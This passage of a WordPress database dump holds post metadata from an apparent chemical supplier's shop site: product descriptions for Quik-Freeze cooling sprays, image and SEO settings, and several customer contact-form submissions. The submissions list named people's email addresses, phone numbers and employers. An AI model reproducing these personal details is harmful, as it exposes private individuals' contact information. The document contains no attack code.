so";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"0";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24752, 2790, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24753, 2790, '_seq_num', '69'); 
INSERT INTO `wp_postmeta` VALUES (24754, 2790, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24755, 2790, '_field_1', 'GRIL ALBERTI'); 
INSERT INTO `wp_postmeta` VALUES (24756, 2790, '_field_10', 'GACHES CHIMIE'); 
INSERT INTO `wp_postmeta` VALUES (24757, 2790, '_field_2', 'mhalberti@gaches.com'); 
INSERT INTO `wp_postmeta` VALUES (24758, 2790, '_field_8', '(056) 271-9595'); 
INSERT INTO `wp_postmeta` VALUES (24759, 2790, '_field_3', 'Good afternoon,\r\nCould you send me please, SDS and TECHNICAL DATA SHEET in FRENCH and ENGLISH (European Format) about this product :\r\nMS-122N/CO2\r\nMany thanks,\r\nBest regards'); 
INSERT INTO `wp_postmeta` VALUES (24760, 2790, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24761, 2790, '_sub_id', '2790'); 
INSERT INTO `wp_postmeta` VALUES (24762, 2788, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24763, 2788, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24764, 2788, '_thumbnail_id', '2789'); 
INSERT INTO `wp_postmeta` VALUES (24765, 2788, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24766, 2788, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24767, 2788, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24768, 2788, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24769, 2788, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24770, 2788, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24771, 2788, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24772, 2788, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24773, 2788, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24774, 2788, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24775, 2788, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24776, 2788, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24777, 2788, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24778, 2788, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24779, 2788, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24780, 2788, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24781, 2788, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24782, 2788, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24783, 2788, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24784, 2788, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24785, 2788, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24786, 2788, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24787, 2788, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24788, 2788, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24789, 2788, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24790, 2788, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24791, 2788, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24792, 2788, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24793, 2788, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24794, 2788, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24795, 2788, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24796, 2788, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24797, 2788, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24798, 2788, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24799, 2788, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24800, 2788, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24801, 2788, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24802, 2788, '_ywtm_content_tab_description', '<h1><strong>MS-242L Quik-Freeze® Ultra</strong></h1>\r\nMiller-Stephenson’s Quik-Freeze® Ultra is designed for convenient use in many industrial applications. They contain HFO 1234ze propellant that has an ultra-low Global Warming Potential (GWP) and is a non-ozone\r\ndepleting chemical. MS-242L is excellent for cooling epoxy in composite forming and reducing tack in prepreg applications. It provides a rapid method of cooling small electronic components. MS-242L is utilized to locate intermittent malfunctions in electronic equipment. Applying the Quik-Freeze® Ultra will have no effect on components operating properly but faulty components will be shocked into failure mode and immediately\r\nidentified. MS-242L freezes small areas to -54°F (-47°C).\r\n<h4><strong>Quik-Freeze® Ultra is recommended for:</strong></h4>\r\n<ul>\r\n 	<li>Cooling of epoxy-composite forming.</li>\r\n 	<li>Reducing tack in pre-preg applications.</li>\r\n 	<li>Heat-cold intermittence testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electromechanical systems.</li>\r\n 	<li>Shrink fit assembly.</li>\r\n 	<li>Freezing biological specimens.</li>\r\n</ul>\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra-Low Global Warming Potential</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td>-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td>1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td>exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td>0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td>0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24803, 2788, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24804, 2788, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24805, 2788, '_yoast_wpseo_primary_product_cat', '94'); 
INSERT INTO `wp_postmeta` VALUES (24806, 2788, '_yoast_wpseo_focuskw_text_input', 'Quik-Freeze'); 
INSERT INTO `wp_postmeta` VALUES (24807, 2788, '_yoast_wpseo_focuskw', 'Quik-Freeze'); 
INSERT INTO `wp_postmeta` VALUES (24808, 2788, '_yoast_wpseo_title', 'MS-242L Quik-Freeze - Low Global Warming No-Ozone Depleting'); 
INSERT INTO `wp_postmeta` VALUES (24809, 2788, '_yoast_wpseo_metadesc', 'MS-242L Quik-Freeze contains HFO 1234ze propellant that has an ultra-low Global Warming Potential (GWP) and is a non-ozone depleting chemical.'); 
INSERT INTO `wp_postmeta` VALUES (24810, 2788, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24811, 2788, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24812, 2791, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24813, 2791, '_seq_num', '87'); 
INSERT INTO `wp_postmeta` VALUES (24814, 2791, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24815, 2791, '_field_12', 'Antonio Quintero'); 
INSERT INTO `wp_postmeta` VALUES (24816, 2791, '_field_13', 'Meggitt'); 
INSERT INTO `wp_postmeta` VALUES (24817, 2791, '_field_18', '2581139'); 
INSERT INTO `wp_postmeta` VALUES (24818, 2791, '_field_14', 'antonio.quintero@meggitt.com'); 
INSERT INTO `wp_postmeta` VALUES (24819, 2791, '_field_15', '(844) 122-2279'); 
INSERT INTO `wp_postmeta` VALUES (24820, 2791, '_field_16', 'Hello.\r\nI´m Antonio from Meggitt Mexico.\r\nI´m requesting please an SDS for PTFE Release Agent for Hot Molds MS-136W. I was wondering if you have it in spanish version.\r\nHope you can help me.\r\n\r\nThanks and Regards!!'); 
INSERT INTO `wp_postmeta` VALUES (24821, 2791, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24822, 2791, '_sub_id', '2791'); 
INSERT INTO `wp_postmeta` VALUES (24823, 2792, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24824, 2792, '_seq_num', '70'); 
INSERT INTO `wp_postmeta` VALUES (24825, 2792, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24826, 2792, '_field_1', 'Daqing Wang'); 
INSERT INTO `wp_postmeta` VALUES (24827, 2792, '_field_10', 'Teradiode'); 
INSERT INTO `wp_postmeta` VALUES (24828, 2792, '_field_2', 'daqingwang@teradiode.com'); 
INSERT INTO `wp_postmeta` VALUES (24829, 2792, '_field_8', '(978) 988-1045'); 
INSERT INTO `wp_postmeta` VALUES (24830, 2792, '_field_3', 'Could you send me quote for one bottle of MS-111 Epoxy Stripping Agent?'); 
INSERT INTO `wp_postmeta` VALUES (24831, 2792, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24832, 2792, '_sub_id', '2792'); 
INSERT INTO `wp_postmeta` VALUES (24833, 2788, '_yoast_wpseo_linkdex', '61'); 
INSERT INTO `wp_postmeta` VALUES (24834, 2793, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24835, 2793, '_seq_num', '71'); 
INSERT INTO `wp_postmeta` VALUES (24836, 2793, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24837, 2793, '_field_1', 'Karie Sorrells'); 
INSERT INTO `wp_postmeta` VALUES (24838, 2793, '_field_10', 'Hybrid Plastics'); 
INSERT INTO `wp_postmeta` VALUES (24839, 2793, '_field_2', 'ksorrells@hybridplastics.com'); 
INSERT INTO `wp_postmeta` VALUES (24840, 2793, '_field_8', '(601) 544-3466'); 
INSERT INTO `wp_postmeta` VALUES (24841, 2793, '_field_3', 'I need to order 1 gallon of Epon 862.  Can you please tell me how  I can order with a credit card.  I don&#039;t see that option on your website.'); 
INSERT INTO `wp_postmeta` VALUES (24842, 2793, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24843, 2793, '_sub_id', '2793'); 
INSERT INTO `wp_postmeta` VALUES (24844, 2794, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (24845, 2794, '_seq_num', '88'); 
INSERT INTO `wp_postmeta` VALUES (24846, 2794, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24847, 2794, '_field_12', 'Renee Onesti'); 
INSERT INTO `wp_postmeta` VALUES (24848, 2794, '_field_13', 'Kent Elastomer Products'); 
INSERT INTO `wp_postmeta` VALUES (24849, 2794, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (24850, 2794, '_field_14', 'ronesti@kentelastomer.com'); 
INSERT INTO `wp_postmeta` VALUES (24851, 2794, '_field_15', '(330) 673-1011'); 
INSERT INTO `wp_postmeta` VALUES (24852, 2794, '_field_16', 'Please e-mail me the updated SDS for MS-122AD. Our cope is from 2011.  ronesti@kentelastomer.com 330-673-1011 x 122'); 
INSERT INTO `wp_postmeta` VALUES (24853, 2794, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (24854, 2794, '_sub_id', '2794'); 
INSERT INTO `wp_postmeta` VALUES (24855, 2795, '_edit_lock', '1477580266:2'); 
INSERT INTO `wp_postmeta` VALUES (24856, 2795, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24857, 2796, '_wp_attached_file', '2016/10/shutterstock_377797663.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24858, 2796, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5078;s:6:"height";i:3385;s:4:"file";s:34:"2016/10/shutterstock_377797663.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377797663-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_377797663-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_377797663-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_377797663-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377797663-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_377797663-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_377797663-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_377797663-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24859, 2795, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24860, 2795, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24861, 2795, '_thumbnail_id', '2796'); 
INSERT INTO `wp_postmeta` VALUES (24862, 2795, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24863, 2795, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24864, 2795, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24865, 2795, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24866, 2795, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24867, 2795, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24868, 2795, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24869, 2795, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24870, 2795, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24871, 2795, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24872, 2795, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24873, 2795, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24874, 2795, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24875, 2795, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24876, 2795, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24877, 2795, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24878, 2795, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24879, 2795, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24880, 2795, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24881, 2795, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24882, 2795, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24883, 2795, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24884, 2795, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24885, 2795, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24886, 2795, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24887, 2795, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24888, 2795, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (24889, 2795, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24890, 2795, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24891, 2795, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (24892, 2795, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24893, 2795, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24894, 2795, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (24895, 2795, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24896, 2795, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24897, 2795, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (24898, 2795, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (24899, 2795, '_ywtm_content_tab_description', '<h1><strong>MS-242L-AS Quik-Freeze® Antistatic Ultra</strong></h1>\r\nMiller-Stephenson’s Quik-Freeze® Antistatic Ultra is designed for convenient use in many industrial applications. It contains HFO 1234ze propellant that has an ultra-low Global Warming. It provides a rapid method\r\nof cooling small electronic components. MS-242L-AS is utilized to locate intermittent malfunctions in electronic equipment. Applying the Quik-Freeze® Ultra will have no effect on components operating properly but faulty components will be shocked into failure mode and immediately identified. MS-242L-AS freezes small areas to -50°F (-45°C).\r\n\r\n<strong>Quik-Freeze® Antistatic Ultra is recommended for:</strong>\r\n<ul>\r\n 	<li>Heat-cold intermittence testing of electronic components.</li>\r\n 	<li>Protection of expensive components during soldering/desoldering.</li>\r\n 	<li>Low temperature circuit testing.</li>\r\n 	<li>Nondestructive testing of electronic and electromechanical systems.</li>\r\n 	<li>Shrink fit assembly</li>\r\n</ul>\r\n<strong>ADVANTAGES</strong>\r\n<ul>\r\n 	<li>Ultra-Low Global Warming Potential</li>\r\n 	<li>Nonconductive</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Odorless</li>\r\n 	<li>Low order of toxicity</li>\r\n 	<li>Compatible with most plastics, elastomers, and metals</li>\r\n 	<li>Leaves no residue</li>\r\n</ul>\r\n<strong>PHYSICAL PROPERTIES OF HFO 1234ze</strong>\r\n<table width="456">\r\n<tbody>\r\n<tr>\r\n<td width="250">Molecular Weight</td>\r\n<td style="text-align: center;" width="206">115</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point</td>\r\n<td style="text-align: center;">-2°F/-19°C</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor pressure (mmHg)</td>\r\n<td style="text-align: center;" width="206">60.8 psia @ 68°F/20°C           159.5 psia @129.9°F/54.4°C</td>\r\n</tr>\r\n<tr>\r\n<td>Density</td>\r\n<td style="text-align: center;">1.17 @ 70°F/21.1°C</td>\r\n</tr>\r\n<tr>\r\n<td>VOC</td>\r\n<td style="text-align: center;">exempt</td>\r\n</tr>\r\n<tr>\r\n<td>ODP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n<tr>\r\n<td>GWP</td>\r\n<td style="text-align: center;">0</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (24900, 2795, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (24901, 2795, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24902, 2795, '_yoast_wpseo_primary_product_cat', '94'); 
INSERT INTO `wp_postmeta` VALUES (24903, 2795, '_yoast_wpseo_title', 'MS-242L-AS Quik-Freeze® Antistatic Ultra - Low Global Warming'); 
INSERT INTO `wp_postmeta` VALUES (24904, 2795, '_yoast_wpseo_metadesc', 'Miller-Stephenson’s Quik-Freeze® Antistatic Ultra low global warming is designed for convenient use in many industrial applications. MS-242L-AS'); 
INSERT INTO `wp_postmeta` VALUES (24905, 2795, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24906, 2795, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24907, 2795, '_yoast_wpseo_focuskw_text_input', 'MS-242L-AS'); 
INSERT INTO `wp_postmeta` VALUES (24908, 2795, '_yoast_wpseo_focuskw', 'MS-242L-AS'); 
INSERT INTO `wp_postmeta` VALUES (24909, 2795, '_yoast_wpseo_linkdex', '69'); 
INSERT INTO `wp_postmeta` VALUES (24910, 2797, '_edit_lock', '1477581483:2'); 
INSERT INTO `wp_postmeta` VALUES (24911, 2797, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24912, 2798, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (24913, 2798, '_seq_num', '72'); 
INSERT INTO `wp_postmeta` VALUES (24914, 2798, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (24915, 2798, '_field_1', 'Paul J Drapeau'); 
INSERT INTO `wp_postmeta` VALUES (24916, 2798, '_field_10', 'Air Liquide Canada Inc.'); 
INSERT INTO `wp_postmeta` VALUES (24917, 2798, '_field_2', 'paul.drapeau@airliquide.com'); 
INSERT INTO `wp_postmeta` VALUES (24918, 2798, '_field_8', '(418) 835-9143'); 
INSERT INTO `wp_postmeta` VALUES (24919, 2798, '_field_3', 'Hi, i need 20 litre can of Vertrel MS 752  for oxygen cleaning purpose.  If it is below 1500 dollars will charge on Visa, if not will get a P.O. \r\nThanks\r\nPaul JD.'); 
INSERT INTO `wp_postmeta` VALUES (24920, 2798, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (24921, 2798, '_sub_id', '2798'); 
INSERT INTO `wp_postmeta` VALUES (24922, 1707, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24923, 1707, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (24924, 1707, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (24925, 1707, '_yoast_wpseo_focuskw_text_input', 'MS-720L'); 
INSERT INTO `wp_postmeta` VALUES (24926, 1707, '_yoast_wpseo_focuskw', 'MS-720L'); 
INSERT INTO `wp_postmeta` VALUES (24927, 1707, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (24928, 1707, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (24929, 1707, '_yoast_wpseo_linkdex', '66'); 
INSERT INTO `wp_postmeta` VALUES (24930, 2800, '_edit_lock', '1478441735:1'); 
INSERT INTO `wp_postmeta` VALUES (24931, 2800, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (24932, 2801, '_wp_attached_file', '2016/10/shutterstock_249558610.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24933, 2802, '_wp_attached_file', '2016/10/shutterstock_486488371.jpg'); 
INSERT INTO `wp_postmeta` VALUES (24934, 2802, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:34:"2016/10/shutterstock_486488371.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_486488371-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_486488371-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_486488371-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_486488371-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_486488371-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_486488371-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_486488371-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_486488371-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (24935, 2800, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (24936, 2800, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (24937, 2800, '_thumbnail_id', '2802'); 
INSERT INTO `wp_postmeta` VALUES (24938, 2800, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24939, 2800, '716_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24940, 2800, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24941, 2800, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24942, 2800, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24943, 2800, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (24944, 2800, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (24945, 2800, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24946, 2800, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24947, 2800, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (24948, 2800, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (24949, 2800, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24950, 2800, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24951, 2800, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (24952, 2800, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (24953, 2800, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (24954, 2800, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (24955, 2800, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (24956, 2800, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (24957, 2800, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (24958, 2800, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (24959, 2800, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24960, 2800, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24961, 2800, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (24962, 2800, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (24963, 2800, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (24964, 2800, '_sold_individually', ''); 
